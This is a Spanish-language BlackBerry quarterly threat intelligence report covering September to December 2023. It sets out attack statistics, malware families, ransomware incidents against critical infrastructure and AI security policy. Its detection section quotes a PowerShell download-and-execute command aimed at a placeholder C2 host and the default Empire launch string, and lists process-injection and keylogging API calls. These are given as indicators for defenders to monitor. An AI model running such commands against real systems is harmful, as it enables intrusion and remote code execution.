BlackBerry Informe trimestral sobre las amenazas mundiales - marzo de 2024

De septiembre a diciembre de 2023, las soluciones de ciberseguridad de BlackBerry detuvieron más de 5.200.000 ciberataques. Aunque este periodo de información es más largo que en ediciones anteriores, un análisis diario de los datos muestra un aumento del 19 % en el número de ciberataques detenidos en este periodo en comparación con nuestra última edición.

Además, hemos observado una media de unas 5.300 muestras únicas de malware al día dirigidas a nuestros clientes, lo que supone un total de más de 630.000 muestras registradas en este periodo de notificación, lo que representa un aumento del 27% con respecto al periodo de notificación anterior.

La figura 2 también muestra los cinco países en los que las soluciones de ciberseguridad de BlackBerry registraron el mayor número de hashes de malware únicos. Estados Unidos ocupa el primer lugar, con el mayor porcentaje de malware único. El segundo, tercer y cuarto país con mayor porcentaje de malware único se encuentran en la región Asia-Pacífico. Corea del Sur ocupó el segundo lugar, seguida de Japón (tercero) y Australia (cuarto). Canadá ocupó el quinto lugar por segundo periodo consecutivo.

Si observamos la figura 2, es obvio que el número total de ataques detenidos por país no está necesariamente correlacionado con el número de hashes únicos registrados.

Hay varios factores detrás de estos resultados, entre ellos la motivación del atacante, la complejidad de los ataques y los objetivos de un ataque. Un atacante podría tener como objetivo la población general de una nación (o una industria específica), utilizando campañas de spam para dirigirse a las masas. Un hash puede rehacerse muy fácilmente, lo que no afecta a la ejecución del código malicioso del archivo, pero cambia los algoritmos hash únicos de un archivo para que parezca diferente a un escáner antimalware.

Los atacantes también pueden emplear malware y herramientas más comunes para causar daños generalizados. Sin embargo, otros pueden centrarse en un pequeño grupo de personas, un sector o una empresa concreta. En los casos hiperdirigidos, las amenazas pueden dirigirse a empleados concretos de una empresa de interés. Estos actores maliciosos pueden incluso desplegar herramientas y tácticas más exclusivas contra objetivos muy específicos y, por lo general, de gran valor, utilizando software de IA generativa para crear deepfakes.

En la figura 3 se puede ver cómo el número total de ataques detenidos y de hashes de malware únicos encontrados varía por país a lo largo del tiempo, desde el periodo de informe anterior hasta el actual.

• Estados Unidos, Japón y Perú se mantienen igual en cuanto al número total de ataques detenidos, mientras que Corea del Sur sube del tercer al segundo puesto en la clasificación de programas maliciosos únicos, superando a Japón.
• Además, en la región de Asia-Pacífico, Australia fue una nueva entrada para la mayoría de los ataques detenidos en este periodo de notificación, ocupando el segundo lugar sólo por detrás de Estados Unidos. Australia ocupó el cuarto lugar en el número de hashes únicos dirigidos a los sistemas de los clientes.      
• BlackBerry's registró que las entidades con sede en Canadá sufrieron menos ataques en este periodo, cayendo del segundo al quinto puesto. En nuestros datos exclusivos sobre programas maliciosos durante este periodo, Canadá mantuvo su quinto puesto.

La reciente entrada de Australia en nuestra lista de los cinco países con más ataques detenidos puede deberse a los recientes acontecimientos geopolíticos. En noviembre de 2023, la Australian Signals Directorate (ASD) publicó su Informe anual sobre ciberamenazas 2022-2023, que revelaba las tendencias clave en ciberdelincuencia a las que se enfrentan los gobiernos, empresas y particulares australianos. En su informe, ASD identificó la asociación AUKUS, con su enfoque en submarinos de propulsión nuclear y otras capacidades militares avanzadas, como "probablemente un objetivo para los actores estatales que buscan robar propiedad intelectual para sus propios programas militares." El director de la ASD continuó afirmando que a medida que Australia "adquiere más capacidad militar, eso obviamente va a llamar la atención en términos de las áreas en las que otros actores van a estar interesados."

La ASD informó además de que en 2023 se presentaron cerca de 94.000 denuncias de actividades ciberdelictivas a las fuerzas de seguridad por parte de particulares y empresas de toda Australia, lo que supone un aumento del 23% con respecto al año anterior, y que solo el ransomware causa hasta 3.000 millones de dólares en daños a la economía australiana cada año. Las pérdidas de las pequeñas empresas australianas víctimas de ciberataques ascendieron a una media de casi 46.000 dólares por empresa el año pasado, frente a los 30.000 dólares del ejercicio anterior.

Para ayudar a contrarrestar este aumento de la ciberactividad, la ASD anunció el lanzamiento de su campaña de concienciación sobre ciberseguridad "Actúe ahora, manténgase seguro", que identificaba las principales ciberamenazas para particulares y pequeñas y medianas empresas. La campaña subrayaba la necesidad de "actuar ahora" para hacer frente a las ciberamenazas, afirmando que "durante demasiado tiempo, los ciudadanos y las empresas australianos han sido abandonados a su suerte frente a las ciberamenazas globales", y establece una visión audaz para ser "un líder mundial en ciberseguridad para 2030".

Infraestructuras críticas

Las infraestructuras críticas son la columna vertebral de cualquier sociedad moderna y son vitales para todos los aspectos de su funcionalidad. De hecho, la organización estadounidense CISA ha definido 16 sectores dispares bajo el paraguas de las infraestructuras críticas. Entre ellos figuran el transporte, la sanidad, la energía, las comunicaciones, las finanzas, la defensa, el sector industrial y varios más.

Dado que los sistemas y activos de muchos de estos sectores se entretejen en un paisaje digital interconectado, se encuentran con frecuencia en el punto de mira de los actores de las ciberamenazas, que intentan explotar las desconfiguraciones y vulnerabilidades de la seguridad por motivos diversos.

Esto se puso de manifiesto a lo largo del último periodo de referencia, en el que CylanceENDPOINT^™ de BlackBerry y otras soluciones de ciberseguridad de BlackBerry detuvieron más de dos millones de ataques contra diversos sectores dentro de las infraestructuras críticas, y solo el sector financiero sufrió más de un millón de ataques.

Además, las organizaciones gubernamentales y del sector público experimentaron la mayor diversidad de ataques, con más del 36% de los hash únicos dirigidos a este sector.

Las ciberamenazas dirigidas a esta diversa gama de sectores tienen el potencial de causar perturbaciones masivas e incapacitar o comprometer activos, sistemas y redes críticos de sus respectivas entidades. Esto, a su vez, puede tener un grave efecto sobre la seguridad económica, la salud pública y la estabilidad social de una nación, independientemente de la escala del ataque, el desarrollo económico de la nación o su nivel de vida.

BlackBerry observó varias familias de malware dirigidas a diversos sectores dentro de nuestra telemetría interna durante el periodo de este informe:

PrivateLoader es una familia de descargadores maliciosos, escritos en C++ y observados continuamente desde que se descubrieron por primera vez en 2021. El malware se utiliza a menudo para facilitar el despliegue de infostealers en el dispositivo de la víctima. Según nuestra telemetría, PrivateLoader fue observado en este periodo de notificación intentando atacar sistemas relacionados con servicios financieros, alimentación y agricultura e instalaciones gubernamentales.  

PrivateLoader es conocido por distribuir una amplia gama de cargas maliciosas de diversa complejidad. La red de distribución del malware se gestiona a través de un servicio clandestino de pago por instalación (PPI), que financia el uso y desarrollo continuos del malware y su infraestructura.

RisePro es un infostealer que se ha visto en la naturaleza desde 2022. A través de nuestras investigaciones de los indicadores de compromiso (IoC) de PrivateLoader, observamos que varias muestras intentaban desplegar malware a través de su servicio de distribución, incluido RisePro. Una vez en el dispositivo de la víctima, RisePro intentará comunicarse con su mando y control (C2) y obtener ilícitamente datos privados y confidenciales antes de enviarlos a los servidores del atacante. Estos datos robados pueden venderse a otro tercero malicioso o utilizarse en actividades secundarias dirigidas a la víctima afectada.

SmokeLoader es un programa malicioso polivalente que ha sido detectado por BlackBerry en informes anteriores. Actúa como puerta trasera independiente, pero a menudo se utiliza como mecanismo de distribución de otros programas maliciosos. SmokeLoader suele descargarse inadvertidamente a través de documentos o enlaces de phishing antes de introducirse en un dispositivo objetivo. Este malware se ha observado en el sector de la energía durante este periodo.

Durante el periodo de referencia, el Centro Nacional de Coordinación de Ciberseguridad de Ucrania (NCSCC) observó un aumento de los ataques relacionados con SmokeLoader dirigidos también a organizaciones gubernamentales. Lo que hace que SmokeLoader sea tan potente es su capacidad para desplegar otros tipos de malware en el dispositivo de la víctima.

SmokeLoader ha sido conocido en el pasado por dejar caer una plétora de infostealers como Amadey, RedLine y Vidar, pero además por actuar como mecanismo de entrega de ransomware. El grupo responsable del ransomware 8Base ya utilizó SmokeLoader para distribuir una variante del ransomware Phobos.

PikaBot es un malware sigiloso y evasivo que surgió a principios de 2023 y ha sido una amenaza destacada durante todo el año. Este malware modular comparte muchas similitudes con el troyano QakBot y puede recibir diversas órdenes de su C2. Durante este periodo, PikaBot fue identificado en entidades gubernamentales y del sector energético.

PikaBot es persistente y cuenta con numerosas funciones para evitar que sea analizado por los investigadores de amenazas, incluidas varias comprobaciones anti-sandbox/anti-análisis. Una vez en el dispositivo de la víctima, el malware puede recibir y ejecutar comandos para recopilar información valiosa del dispositivo y ejecutar órdenes recibidas desde su C2.

Los infosecuestradores de productos básicos también se han mostrado moderadamente activos a lo largo de este trimestre. Muchos de ellos se venden como MaaS y se utilizan en campañas a gran escala.

LummaStealer (LummaC2) es un infostealer basado en C que se centra en extraer datos privados y confidenciales del dispositivo de la víctima. LummaStealer tiene una notable capacidad para obtener datos de monederos de criptomonedas y datos de extensiones de navegador de autenticación de dos factores (2FA). A lo largo del periodo del informe, LummaStealer fue observado por BlackBerry dirigiéndose a instituciones financieras y entidades gubernamentales.

RompeRécords (RaccoonStealer) es otro infostealer ampliamente distribuido que se cerró temporalmente debido a la detención de un miembro del grupo principal de la amenaza en 2022. Sin embargo, el grupo regresó a mediados de 2023 con una versión actualizada. Nuestra telemetría registró a RecordBreaker atacando instituciones sanitarias, tanto en este periodo como en el anterior.

RedLine infostealer ha sido una de las amenazas más observadas de BlackBerryen informes anteriores. El infostealer compilado en .NET se centra principalmente en el robo de credenciales y de varios programas y plataformas digitales, con especial atención a la información de tarjetas de crédito y monederos de criptomonedas. 

RedLine está ampliamente disponible a través de foros clandestinos y se vende como suscripción o como producto independiente por un coste relativamente bajo. En este periodo, la familia de malware se dirigió principalmente a los sectores de las comunicaciones y la administración pública.

A lo largo de este periodo, el panorama general de las ciberamenazas también fue muy activo y se produjeron varios ataques notables contra organizaciones de infraestructuras críticas de todo el mundo.

A mediados de octubre, el Morrison Community Hospital, con sede en Illinois, fue la presunta víctima de una brecha de la banda de ransomware BlackCat/ALPHV con una aparición en su oscuro sitio web. El propio hospital publicó una notificación de seguridad varias semanas después en su sitio en la que afirmaba que habían sufrido un incidente a finales de septiembre que "implicó que una parte no autorizada accediera a nuestro entorno de red." Sin embargo, no mencionaba el nombre del atacante ni si se habían bloqueado o robado archivos. 

En noviembre, la entidad energética estatal eslovena Holding Slovenske Elektrarne (HSE) fue víctima de un ataque de ransomware. Como proveedora de aproximadamente el 60 por ciento de la producción energética del país, fue una suerte que la brecha y el cifrado de archivos no impidieran la producción o la salida de energía.

Aunque los atacantes en este caso no fueron nombrados oficialmente, el grupo Rhysida ransomware puede haber sido el culpable. Este grupo afirmó haber victimizado a HSE en su sitio web varias semanas después.

Noviembre también trajo noticias de otra entidad estatal que fue objeto de un ataque y una violación por parte de una banda de ransomware. Esta vez se trataba de una empresa de servicios de telecomunicaciones de propiedad mayoritariamente estatal, que había sido víctima de un ataque un mes antes por parte de la banda RansomEXX, con un robo de hasta 6 GB de datos. Esto incluía muchas formas diferentes de información personal identificable (PII). Los informes también indican que un archivo de datos CSV con información sobre más de un millón de sus clientes se filtró en la dark web.

RansomEXX (también conocido como Defray y Defray777) es una familia de ransomware que se vio por primera vez en 2018. Hay variantes tanto para Windows como para Linux de esta familia de malware, que se utilizó notablemente en exploits de alto perfil en agencias gubernamentales y fabricantes. RansomEXX funciona como un modelo de ransomware como servicio (RaaS), con una variante llamada RansomEXX2 escrita en el lenguaje de programación Rust que apareció en 2022.

En Estados Unidos, CISA emitió una alerta el 28 de noviembre de 2023, en respuesta a lo que CISA denominó "explotación activa de los controladores lógicos programables (PLC) de Unitronics." Se trata de ordenadores utilizados en instalaciones de agua y aguas residuales. La alerta especificaba que este tipo de instalaciones estaban siendo activamente atacadas por actores de ciberamenazas y aconsejaba a otras instalaciones de agua y aguas residuales que siguieran todas las directrices y medidas de precaución recomendadas.

En una continuación de la actividad mencionada en la edición de noviembre de 2023 de nuestro Informe de Inteligencia sobre Amenazas Globales, la banda LockBit continuó atacando organizaciones de infraestructuras críticas, a pesar de un intento de desmantelamiento por parte del FBI en febrero de 2024. En la víspera de Navidad de 2023, la banda LockBit estuvo implicada en un ataque a la red hospitalaria alemana Katholische Hospitalvereinigung Ostwestfalen gGmbH (KHO). El ataque, perpetrado de madrugada, logró violar y cifrar datos de archivos, lo que provocó graves interrupciones en los servicios de tres hospitales diferentes de KHO.

También se vio a la banda LockBit dirigirse a otras entidades y sectores dentro de infraestructuras críticas aprovechando la explotación de CVE-2023-4966 -la vulnerabilidad Citrix Bleed- para obtener acceso inicial. Esto dio lugar a que el gobierno de EE.UU. emitiera un aviso conjunto de ciberseguridad (CSA) sugiriendo a las organizaciones que parcheen y sigan todas las directrices de mitigación recomendadas y las mejores prácticas.

Para las víctimas de LockBit en el pasado, ya están disponibles herramientas de recuperación de archivos. El FBI, Europol, la policía japonesa y la Agencia Nacional contra el Crimen han colaborado para que estas herramientas estén disponibles en el portal "No More Ransom", ahora disponible en 37 idiomas.

Las empresas comerciales, sobre todo las manufactureras y minoristas, fueron objeto de numerosos ataques en los últimos cuatro meses.

En noviembre, minoristas israelíes fueron presuntamente atacados por el grupo hacktivista Cyber Toufan, que también atacó a la empresa israelí de hosting Signature-IT. Desde noviembre de 2023, en el contexto del actual conflicto entre Israel y Hamás en Gaza, el grupo habría lanzado cientos de operaciones cibernéticas contra objetivos israelíes. Muchos minoristas de todo el mundo, como IKEA, se vieron gravemente afectados por el ataque a Signature-IT. En un mensaje publicado en su canal de Telegram, el grupo afirmó haber afectado a más de 150 víctimas. Al parecer, borraron y destruyeron más de 1.000 servidores y bases de datos críticas.  

Diciembre trajo un recordatorio de que la mayor amenaza para las empresas suele ser su propia complacencia. Una base de datos desprotegida y accesible a través de Internet, alojada en Real Estate Wealth Network, fue descubierta por agentes maliciosos y saqueada. La base contenía 1,16 TB de datos -aproximadamente 1.500 millones de registros-, incluidos los nombres de propietarios, vendedores e inversores. La base de datos representa una recopilación central de datos inmobiliarios de Estados Unidos, que incluye direcciones de funcionarios e incluso información sobre deudas.

Las víctimas de estos ataques varían en función de los objetivos del grupo delictivo de ransomware. A finales de 2023, uno de los mayores fabricantes de ropa, calzado y prendas de vestir, VF Corporation, fue atacado por el grupo de ransomware ALPHV (BlackCat). En este momento, la investigación no está resuelta, pero se ha confirmado que se robaron los datos de 35,5 millones de clientes de marcas como North Face, Timberland y Vans.

El Informe sobre Riesgos Mundiales 2024 del Foro Económico Mundial sitúa la amenaza de la ciberinseguridad entre los "riesgos mundiales más graves previstos para los próximos dos años." Armados con técnicas cada vez más sofisticadas, incluido el aprovechamiento de la inteligencia artificial (IA), el consenso es que los ciberataques seguirán siendo altamente perturbadores y tendrán cada vez más como objetivo infraestructuras críticas. 

BlackBerry La telemetría demuestra que las entidades de infraestructuras críticas se enfrentaron a numerosos ataques durante el periodo cubierto por este informe. Los ataques son cada vez más sofisticados, con el uso de nuevas técnicas de malware, incluidas las generadas por IA, que aumentan el riesgo de paralizar las infraestructuras críticas. Los gobiernos de todo el mundo han puesto en marcha una serie de medidas destinadas a aumentar la ciberresiliencia de las infraestructuras críticas, con especial énfasis en la protección contra los riesgos asociados al uso malicioso de la IA.

Si bien los gobiernos reconocen que la IA tiene un importante potencial para el bien, incluida la mejora de la eficiencia operativa de los sistemas de infraestructuras críticas, muchos también temen que el impulso para optimizar la eficiencia mediante el despliegue de sistemas basados en IA en infraestructuras críticas pueda plantear graves riesgos para la seguridad.

Para evitarlo, los gobiernos están pidiendo a la industria que dé prioridad a la seguridad a la hora de desarrollar y desplegar modelos de IA cada vez más potentes:

"En las últimas cuatro décadas, desde la creación de Internet hasta la adopción masiva de software, pasando por el auge de las redes sociales, hemos sido testigos de cómo la seguridad y la protección se han visto obligadas a pasar a un segundo plano, ya que las empresas priorizan la velocidad de comercialización y las prestaciones por encima de la seguridad. El desarrollo y la implantación del software de IA deben romper el ciclo de la velocidad a expensas de la seguridad."

- Hoja de ruta de la CISA para la IA

Gobiernos de todo el mundo se han apresurado a elaborar y publicar directrices que fomentan un enfoque "seguro por defecto" del desarrollo y el uso de potentes sistemas de IA. Otros países y alianzas políticas como el Reino Unido, Canadá, la UE y el G7 también han publicado directrices sobre el desarrollo y uso responsables de sistemas avanzados de IA. Esto incluye directrices conjuntas respaldadas por más de 20 agencias nacionales de ciberseguridad a nivel mundial que hacen hincapié en la necesidad de que los constructores de sistemas de IA tomen decisiones informadas sobre el diseño, el desarrollo, el despliegue y el funcionamiento de los sistemas de IA de manera que se dé prioridad a la seguridad durante todo el ciclo de vida del sistema.

Asimismo, en octubre de 2023, el Presidente de EE.UU. Biden publicó una Orden Ejecutiva sobre "Inteligencia Artificial segura y fiable"(OE 14110) que, entre otras cosas, ordenaba a la CISA evaluar los riesgos potenciales relacionados con el uso de IA en sectores de infraestructuras críticas, incluidas las formas en que el despliegue de IA puede hacer que los sistemas de infraestructuras críticas sean más vulnerables a fallos, ataques físicos y ciberataques.  

En noviembre de 2023, BlackBerry anunció un acuerdo histórico de ciberseguridad con el Gobierno de Malasia, que les permitirá aprovechar el conjunto completo de soluciones de ciberseguridad de confianza de BlackBerry , con el fin de reforzar la postura de seguridad de Malasia. Como parte de este esfuerzo, BlackBerry se ha asociado con el SANS Institute para abrir un Centro de Excelencia en Ciberseguridad (CCoE) de última generación en Kuala Lumpur, la capital de Malasia, en 2024. El CCoE ofrecerá formación especializada para mejorar la capacidad y la preparación de Malasia en materia de ciberseguridad. BlackBerry está encantado de ayudar a construir el ecosistema de aprendizaje de ciberseguridad del país, especialmente en las áreas de IA y aprendizaje automático, para ayudar a crecer y mejorar la cualificación de la mano de obra de ciberseguridad de Malasia, así como para hacer que la región Indo-Pacífica sea más segura.

El primer ministro canadiense, Justin Trudeau, ha declarado: "La ciberseguridad es un pilar clave de la Estrategia Indo-Pacífica de Canadá, cuyo objetivo es avanzar en la paz, la seguridad y la cooperación en la región. La ciberseguridad es un reto compartido que requiere cooperación internacional, razón por la cual apoyamos firmemente el Centro de Excelencia en Ciberseguridad BlackBerry en Malasia, un importante socio bilateral de Canadá. Apoyando a los futuros ciberdefensores de Malasia y estableciendo redes regionales más sólidas para el intercambio de conocimientos entre Canadá y el Sudeste Asiático, podemos reforzar aún más la resistencia y la capacidad de nuestros dos países y de la región en general para contrarrestar, disuadir y responder a las ciberamenazas."

A lo largo del periodo de referencia, gobiernos y empresas recibieron constantes recordatorios de la vulnerabilidad de sus redes. En septiembre de 2023, se reveló que piratas informáticos chinos habían violado la plataforma de correo electrónico de Microsoft, robando decenas de miles de correos electrónicos de cuentas del Departamento de Estado estadounidense. Esto siguió a informes anteriores de ataques similares contra otros objetivos del gobierno estadounidense, incluido el Departamento de Comercio. Recientemente, también se reveló que las autoridades canadienses que trabajan en Global Affairs Canada sufrieron una "prolongada violación de la seguridad de los datos".

Como subraya el Centro de Ciberseguridad de Canadá en su más reciente "Evaluación de la Ciberamenaza Nacional", las infraestructuras críticas están cada vez más expuestas a ciberamenazas. Los actores patrocinados por el Estado están tratando activamente de infiltrarse en estos sistemas, y las tecnologías disruptivas, como la IA, pueden permitir nuevas amenazas. Como se señala en este informe, Australia también sufrió múltiples ciberataques de alto perfil en su infraestructura crítica, incluyendo la segunda mayor empresa de telecomunicaciones de Australia, Optus, y la mayor aseguradora de salud privada, Medibank.

La industria tampoco es inmune a estas amenazas, y en 2023 surgieron nuevas normativas para empezar a abordar este problema.... Por ejemplo, en diciembre de 2023 entró en vigor un nuevo conjunto de normas que obliga a las empresas que cotizan en bolsa a revelar a la Comisión del Mercado de Valores de Estados Unidos los incidentes cibernéticos "importantes" en un plazo de cuatro días. En Europa, la UE aprobó recientemente la Ley de Ciberresiliencia, que establece nuevos requisitos de ciberseguridad para los productos de hardware y software con elementos digitales vendidos en la Unión Europea. Esto se suma a las medidas adicionales exigidas en la Directiva actualizada sobre seguridad de las redes y de la información de la UE para ayudar a hacer frente a las vulnerabilidades de ciberseguridad de las entidades de infraestructuras críticas.

Por último, en noviembre de 2023, Australia publicó su Estrategia de Ciberseguridad, que abogaba por un enfoque de "toda la nación" para proteger la información crítica, compartir inteligencia sobre amenazas y promover el uso de productos tecnológicos que sean seguros y protegidos.

Ante la constante evolución del panorama de las amenazas, BlackBerry ha hecho un llamamiento constante a la necesidad de modernizar la seguridad sustituyendo las tecnologías heredadas (como las VPN) por modernas soluciones de ciberseguridadbasadas en la "confianza cero" e impulsadas por la IA que evalúen continuamente la postura de seguridad de un dispositivo para prevenir los ciberataques antes de que se produzcan. Las tecnologías de ciberseguridad que dan prioridad a la prevención y emplean un enfoque de confianza cero serán cada vez más importantes a medida que los actores de las amenazas desarrollen formas más sofisticadas de burlar la seguridad informática tradicional o heredada. 

A lo largo del próximo año, es probable que aumente la amenaza que suponen los ciberataques, cada vez más sofisticados. Lo que más preocupa a las autoridades de los países democráticos de todo el mundo es hasta qué punto los actores maliciosos utilizarán las técnicas digitales para perturbar los procesos democráticos. Se calcula que el 49% de la población mundial de 64 países acudirá a las urnas para votar en 2024, por lo que algunos expertos empiezan a dar la voz de alarma de que los procesos y la infraestructura electorales también podrían ser un objetivo prioritario. Jen Easterly, directora de la CISA del gobierno estadounidense, advirtió de que "la IA generativa amplificará los riesgos de ciberseguridad y hará más fácil, rápido y barato inundar el país con contenidos falsos."

Y añadió: "Ahora que esta tecnología está más disponible y es más potente que nunca, su uso malintencionado está a punto de poner a prueba la seguridad del proceso electoral de Estados Unidos, al dar a agentes nefastos que pretenden socavar la democracia estadounidense -incluidos China, Irán y Rusia- la capacidad de potenciar sus tácticas".

El sistema Common Vulnerabilities and Exposures (CVE), mantenido por The MITRE Corporation, es un catálogo de información sobre vulnerabilidades y exposiciones conocidas públicamente. El sistema CVE está patrocinado por el Departamento de Seguridad Nacional de Estados Unidos (DHS) y CISA.

En este periodo se han detectado nuevas vulnerabilidades en los productos ^Cisco®, ^Apache®, ^Citrix® y ^JetBrains®. Aunque ya se han publicado los métodos de mitigación de estas vulnerabilidades, algunas amenazas han seguido aprovechándose de los sistemas sin parches.

Comprender las técnicas de alto nivel de los grupos de amenazas puede ayudar a decidir qué técnicas de detección deben priorizarse. BlackBerry observó las siguientes 20 técnicas principales de MITRE utilizadas por los actores de amenazas en este periodo de notificación.

Una flecha hacia arriba en la última columna indica que el uso de la técnica ha aumentado desde nuestro último informe. Una flecha hacia abajo indica que el uso ha disminuido desde nuestro último informe. Un símbolo igual (=) significa que la técnica se mantiene en la misma posición que en nuestro último informe.

La inyección de procesos es una técnica de evasión defensiva comúnmente explotada que se produce cuando se coloca código malicioso dentro del espacio de direcciones de otro proceso en ejecución.

A continuación se muestran una serie de funciones nativas de Windows de las que se puede abusar inyectándolas en un proceso.

Funciones llamadas en orden (varía según el ataque):

• VirtualAlloc(Ex) - Asignación de memoria en el proceso
• WriteProcessMemory() - Escritura de código malicioso en la memoria asignada
• VirtualProtect - Reprotección de memoria con permisos ejecutables
• CreateRemoteThread() - Ejecuta código malicioso en el contexto de otro proceso

Los atacantes utilizan software de robo de información personalizado para registrar las entradas de los usuarios en un sistema comprometido mediante la supervisión de la interfaz gráfica de usuario (GUI) o, alternativamente, mediante el registro de las pulsaciones de teclas.

BlackBerry descubrió que, vigilando los procesos inusuales que realizaban capturas de entrada de cualquier forma, era posible identificar y remediar con éxito las amenazas.

El comportamiento común que BlackBerry definiría como "inusual" incluye firmas inválidas, procesos hijos que se generan a partir de un proceso padre atípico y llamadas a funciones específicas de la API de Windows.

Llamadas a funciones para supervisar:

• SetWindowsHook(Ex) - Monitorizar eventos como entradas en el escritorio
• GetKeyboardState() - Obtener el estado actual de la tecla virtual
• GetKeyState() - Obtener el estado actual de la llave virtual
• GetAsyncKeyState() - Obtener el estado actual de la llave virtual

Enumerar la información de un sistema comprometido puede proporcionar a un actor de amenazas el contexto para identificar más a fondo las debilidades y los vectores potenciales de explotación, con el fin de escalar privilegios y obtener acceso sin restricciones al sistema.

Mediante la creación de una línea de base de comportamiento común en toda la red y la observación de valores atípicos, los profesionales de la ciberseguridad pueden observar cualquier anomalía.

Abusando de Windows Management Instrumentation (WMI), un actor de amenazas puede localizar información sobre software antivirus, discos lógicos y usuarios, para identificar puntos de giro, o áreas de interés/debilidades que un atacante pueda explotar. Sin embargo, estas llamadas son relativamente poco convencionales para la mayoría de los usuarios. Vigilar su aparición podría identificar a un actor malicioso o malware en el sistema víctima.

A continuación se muestran líneas de comando que pueden ser útiles para supervisar:

• SELECT * FROM AntiVirusProduct - Una línea de comandos WMI para enumerar los productos antivirus presentes en el sistema
• wmic OS get OSArchitecture, Version - Utiliza WMI para enumerar la información de la versión del sistema
• systeminfo - Proporciona información del sistema al usuario
• driverquery /v - Lista las unidades instaladas en el sistema

Los atacantes pueden ejecutar su propio código malicioso aprovechando el orden de búsqueda de las bibliotecas de vínculos dinámicos (DLL). Para ello, colocan la carga maliciosa y la aplicación legítima de la víctima una al lado de la otra. Después, cada vez que se ejecute un ejecutable legítimo, cargará el binario malicioso mientras el atacante aprovecha el orden de búsqueda normal del sistema.

Además, las ubicaciones del sistema, como las carpetas de Windows Side-by-Side (SxS) y del sistema, deben vigilarse cuidadosamente para detectar la eliminación y sustitución de DLL, un movimiento que los adversarios más avanzados intentarán para evadir las modernas soluciones antivirus/de detección y respuesta de punto final (EDR).

Una forma habitual de identificar la carga lateral de DLL es controlar los módulos que se cargan desde ubicaciones anómalas como la papelera de reciclaje, las carpetas temporales y las rutas normales del sistema.

Al utilizar protocolos que no son de la capa de aplicación, los adversarios intentan evadir las defensas que están maduras y afinadas para detectar comportamientos maliciosos. Desde el punto de vista de la mitigación y la prevención, los protocolos menos comunes, como ICMP, deben vigilarse para detectar comunicaciones C2.

Un enfoque seguro y que mitiga los riesgos que pueden adoptar los clientes de BlackBerry consiste en crear reglas personalizadas para supervisar cadenas específicas en la capa de red y utilizarlas en combinación con reglas de detección de comportamiento más avanzadas. Mediante la superposición de medidas preventivas junto con una presencia de seguridad adecuada, los clientes de BlackBerry y los defensores por igual pueden reducir su susceptibilidad a los ataques y aumentar su conciencia de seguridad.

En el último informe, el equipo de CylanceGUARD descubrió que se abusaba de la técnica "Common File Archive Exfiltration Staging" en todas las regiones geográficas en las que BlackBerry tiene clientes. Sin embargo, en este periodo de informes registramos un patrón de detecciones de PowerShell en todas las regiones.

En las regiones EMEA y NALA, el equipo de CylanceGUARD observó un aumento de las detecciones relacionadas con PowerShell Empire: "Possible Empire Encoded Payload". PowerShell Empire es un framework post-exploit de código abierto que es comúnmente utilizado tanto por atacantes como por penetration testers/red teams legítimos.

El marco de Empire se centra esencialmente en atacar entornos Windows utilizando el lenguaje de scripting PowerShell. Esto permite a un atacante comunicarse con la máquina de la víctima para entregar y recibir comandos e información de servidores C2.

Un indicador precoz de Imperio es la detección de un comando como:

"POWERSHELL -NOP -STA -W 1 -ENC". Esta es la cadena de lanzamiento por defecto en Empire HTTP Listeners.

Tenga en cuenta que es trivial para el atacante cambiar u ofuscar este valor. Sin embargo, en muchos casos este valor no se cambia y, por lo tanto, constituye una firma eficaz para los equipos de detección y los analistas del centro de operaciones de seguridad (SOC).

En la región APAC, observamos un cambio de la táctica Acceso a credenciales(TA0006) a Ejecución(TA0002) como la amenaza más comúnmente observada. PowerShell volvió a tener una presencia importante en nuestras detecciones. La técnica relacionada de MITRE observada fue Command and Scripting Interpreter: PowerShell(T1059.001). Durante nuestras investigaciones, el patrón más comúnmente observado utilizado por los actores de amenazas fue una cuna de descarga - se trata de un único comando utilizado tanto para la descarga como para la ejecución de código.

Por ejemplo:

powershell.exe -exec bypass -C "IEX (Nuevo-Objeto Net.WebClient).DownloadString('hxxp://x.x.x.x/prueba[.]exe')

- Esto descargaría y ejecutaría el archivo test.exe desde un posible servidor C2.

El patrón de detección de PowerShell en los entornos de nuestros clientes pone de relieve la importancia de garantizar que las organizaciones dispongan de la visibilidad y los controles adecuados para limitar los abusos relacionados con PowerShell.

Como parte de la oferta de CylanceGUARD , nuestro equipo de onboarding (conocidos como consultores ^ThreatZERO® ) trabaja estrechamente con nuestros clientes para asegurar que sus dispositivos se colocan en las políticas recomendadas como Script Control Block (SCB - PS) para limitar la capacidad de un atacante para abusar de utilidades como PowerShell.

Este informe representa los esfuerzos de colaboración de nuestros talentosos equipos e individuos. En particular, nos gustaría expresar nuestro reconocimiento:

Adrian Chambers
Amalkanth Raveendran
David Hegarty
Dean Given
Geoff O'Rourke
Ismael Valenzuela Espejo
Jacob Faires
John de Boer
Kristofer Vandercook
Natalia Capponi
Natasha Rohner
Patryk Matysik
Pedro Drimel
Ronald Welch
Travis Hoxmeier
William Johnson

La información contenida en el informe BlackBerry Global Threat intelligence Report tiene únicamente fines informativos. BlackBerry no garantiza ni se responsabiliza de la exactitud, integridad y fiabilidad de las declaraciones o investigaciones de terceros a las que se hace referencia en el presente documento. El análisis expresado en este informe refleja el conocimiento actual de la información disponible por parte de nuestros analistas de investigación y puede estar sujeto a cambios a medida que conozcamos información adicional. Los lectores son responsables de actuar con la debida diligencia a la hora de aplicar esta información a su vida privada y profesional. BlackBerry no aprueba ningún uso malintencionado o indebido de la información presentada en este informe.